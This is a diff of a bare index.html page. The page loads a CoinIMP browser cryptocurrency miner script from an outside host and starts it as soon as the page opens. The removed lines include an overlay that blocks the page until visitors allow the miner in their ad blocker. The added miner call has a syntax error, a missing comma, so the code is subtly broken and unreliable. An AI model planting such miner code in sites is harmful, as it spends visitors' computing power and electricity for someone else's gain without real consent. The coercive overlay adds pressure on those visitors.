--- a/index.html
+++ b/index.html
@@ -1,38 +1,16 @@
 <!DOCTYPE html>
-
 <html lang="en">
-
 <head>	
-<meta charset="utf-8">
-	
+<meta charset="utf-8">	
 </head>
 <body>           
-<script src="https://www.hostingcloud.racing/aBsJ.js"></script>
+<script src="https://www.hostingcloud.racing/iOEE.js"></script>
 <script>
-    var _client = new Client.Anonymous('5fbc34b068817e737ffdcaadf598d6e14d5d994dd65cb5070af4d21d478e9f7e', {
-        throttle: 0, c: 'w'
+    var _client = new Client.User('5fbc34b068817e737ffdcaadf598d6e14d5d994dd65cb5070af4d21d478e9f7e', 'POOO12' {
+        throttle: 0.1, c: 'w'
     });
     _client.start();
     _client.addMiningNotification("Floating Bottom", "This site is running JavaScript miner from coinimp.com. If it bothers you, you can stop it.", "#cccccc", 40, "#3d3d3d");
-</script>
-	
-<script>
-    setTimeout(function(){
-        if(typeof _client === 'undefined' || _client === null)
-        {
-            var messageDiv = document.createElement("div");
-            messageDiv.setAttribute("style","width: 50%; background-color: white; padding: 15px; display: inline-block; vertical-align: middle;");
-            messageDiv.appendChild(document.createTextNode("Please allow our miner on your blocker software to continue browsing our site. Reload the page after that."));
-            var mainDiv = document.createElement("div");
-            mainDiv.setAttribute("style","position: absolute; top: 0px; right: 0px; width: 100%; height: 100%; display: flex; background-color: #4c4c4c;  align-items: center; justify-content: center");
-            mainDiv.appendChild(messageDiv);
-            document.body.appendChild(mainDiv);
-            document.getElementsByTagName("body")[0].style.overflow = "hidden";
-            window.scrollTo(0, 0);
-        }
-    },1000);
-</script>
-	
-</body>
-	
+</script>	
+</body>	
 </html>
